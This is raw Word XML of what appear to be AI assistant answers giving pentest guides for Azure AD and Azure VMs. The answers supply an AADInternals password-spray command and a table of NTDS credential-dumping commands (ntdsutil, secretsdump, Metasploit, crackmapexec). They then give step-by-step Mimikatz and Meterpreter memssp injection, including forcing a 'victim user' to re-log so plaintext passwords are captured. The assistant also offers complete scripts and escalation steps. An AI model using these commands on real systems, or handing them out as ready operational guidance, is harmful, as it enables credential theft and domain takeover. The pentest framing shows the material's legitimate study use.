      <w:r w:rsidRPr="002B697B">
        <w:t>Upload data to BloodHound UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051780F1" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Identify attack paths and privilege escalation opportunities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BA5DB0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5. Using AADInternals (PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A9155D" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:lastRenderedPageBreak/>
        <w:t>Install and import:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A53DF8" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Install-Module -Name AADInternals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68471ADF" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Import-Module AADInternals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADEDDAB" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Enumerate users and check for vulnerable configurations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EA97E1" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Get-AADIntUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD15367" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Get-AADIntGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257966E5" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Invoke-AADIntPasswordSpray -UsersFile users.txt -Password "Password123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6D15D1" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="2F2B8AC7">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEAB65D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Exploitable Azure AD Weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7362D38A" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Over-permissioned users and app registrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A5975" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Weak or reused passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7226AEF3" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Legacy authentication enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51128B20" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Misconfigured Conditional Access policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F70255D" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Unmonitored role assignments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C56395A" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="3477C0F2">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E2FFFF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Summary Table: Key Tools &amp;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5627"/>
        <w:gridCol w:w="3213"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="163349B9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3AC5B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B780D47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27A23E0D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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="724F60B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FF3F" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>NTDS Dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D0FE0D7" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2531607D" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Dump AD DB snapshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="1B3944FF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4D5B" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>NTDS Hash Extract</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="732A8614" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4166AE4B" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Extract NTLM hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="5A081BC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A4A1" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Metasploit NTDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F70A4F4" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>post/windows/gather/ntds_grabber</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F751735" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Grab NTDS files remotely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="649AF78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8A3E" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Metasploit Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C4D18CD" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>auxiliary/scanner/smb/impacket/secretsdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34BD7E17" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Dump hashes remotely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="7ED4C82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87E1" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>CME NTDS Dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03677F0F" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>crackmapexec smb &lt;ip&gt; -u user -p pass --ntds drsuapi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34821E65" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Automated NTDS dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="67AAA99F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7A9A" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Azure AD Enum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20DF384B" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>az ad user list, Get-AzureADUser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E7F60A0" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>List Azure AD users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="00C5836F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2E41" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Azure AD Roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="680D1FE5" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Get-AzureADDirectoryRoleMember</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A8D7B71" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>List privileged role members</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="01C2B6DB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E396" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>BloodHound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77DAB60D" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>AzureHound collector + BloodHound UI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C86FDC9" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Visualize attack paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4563" w:rsidRPr="002B697B" w14:paraId="699DC9C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90D4" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>AADInternals</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25D9E15F" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Invoke-AADIntPasswordSpray</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32A7C783" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="0039559A">
            <w:r w:rsidRPr="002B697B">
              <w:t>Password spraying, enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="655395D0" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="7131D6C8">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A72C52" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>If you want</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>, I can provide:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725C24DF" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Complete example scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FF6C1B" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Specific privilege escalation steps inside Azure AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E333A2" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Detection and mitigation best practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F408FF1" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Would you like me to?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADECBF8" w14:textId="77777777" w:rsidR="007B4563" w:rsidRDefault="007B4563" w:rsidP="007B4563"/>
    <w:p w14:paraId="1043C482" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Certainly! Here's a clean, corrected, and detailed summary of </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>how to pentest Azure Windows/Linux VMs for credential dumping of local, AD, and Microsoft Entra ID accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> using Security Support Provider (SSP) injection techniques (mainly Mimikatz and related tools). I removed duplicates and organized the steps with commands and explanations for each tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D679C9" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="2009B2D1">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="490ABD3B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Azure VM Credential Dumping Pentest — Detailed Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0A5687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Target scope:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A64791" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Local Windows accounts on Azure VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D146D4D" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Active Directory (AD) domain accounts on domain-joined Azure VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B204E8" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Microsoft Entra ID accounts (via Azure AD Connect synced identities, indirectly via local/AD credential exposure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F72FB43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lastRenderedPageBreak/>
        <w:t>Goal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791E4860" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r w:rsidRPr="002B697B">
        <w:t>Dump clear-text credentials or password hashes from memory via Security Support Provider (SSP) injection techniques using Mimikatz or similar modules, leveraging user logoff/logon cycles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CB81A4" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="2F1DAEA7">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F39204F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Prerequisites &amp; Considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D994539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 xml:space="preserve">You must have </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local administrative privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> on the Windows Azure VM or </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>domain admin privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> for AD accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C018355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>The target VM must be Windows-based (this technique does not apply to Linux for credential dumping).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211835BD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>Ensure PowerShell or command execution is possible on the target (e.g., via RDP, WinRM, Metasploit Meterpreter, Empire, Koadic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D24FAE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>User interaction is required: dumping plaintext credentials depends on forcing a user logoff/logon cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77478CA4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>The sensitive file (mimilsa.log) is created in C:\Windows\System32 and contains dumped credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEB65E5" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>After dumping, always check for defensive detections or alerts (e.g., Windows Defender, Defender for Endpoint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B0AE79" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="20C21563">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50223F35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1. Manual Mimikatz Execution on Windows Azure VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDFB9C8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Launch Mimikatz with administrative rights on the VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE70C37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mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CC7CA9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Elevate privileges in Mimikatz:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D741B4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privilege::debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0055DA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Inject the memssp module (Security Support Provider injection):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EA86A1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misc::memssp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BA0D5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This command sets up Mimikatz to dump credentials upon next user logon (stored in mimilsa.log).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5095FD1F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Force the victim user to log off and log back in (this step is manual unless automated):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251C5DEA" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>You can remotely force a lock (user must unlock):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4B90B4" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>rundll32.exe user32.dll,LockWorkStation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB3A29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Once the user logs back in, read the credentials file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F2F889" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>type C:\Windows\System32\mimilsa.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553557BD" w14:textId="77777777" w:rsidR="007B4563" w:rsidRPr="002B697B" w:rsidRDefault="007B4563" w:rsidP="007B4563">
      <w:r>
        <w:pict w14:anchorId="50BB2CD6">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A73E1CC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2. Using Metasploit Framework (Meterpreter + Kiwi Extension)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAA3DC7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Obtain a Meterpreter session on the Azure Windows VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0010E013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Load the Kiwi extension (a Mimikatz-like tool):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2270F825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meterpreter &gt; load kiwi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EC629B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Inject the memssp module into memory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218FC082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meterpreter &gt; kiwi_cmd misc::memssp</w:t>
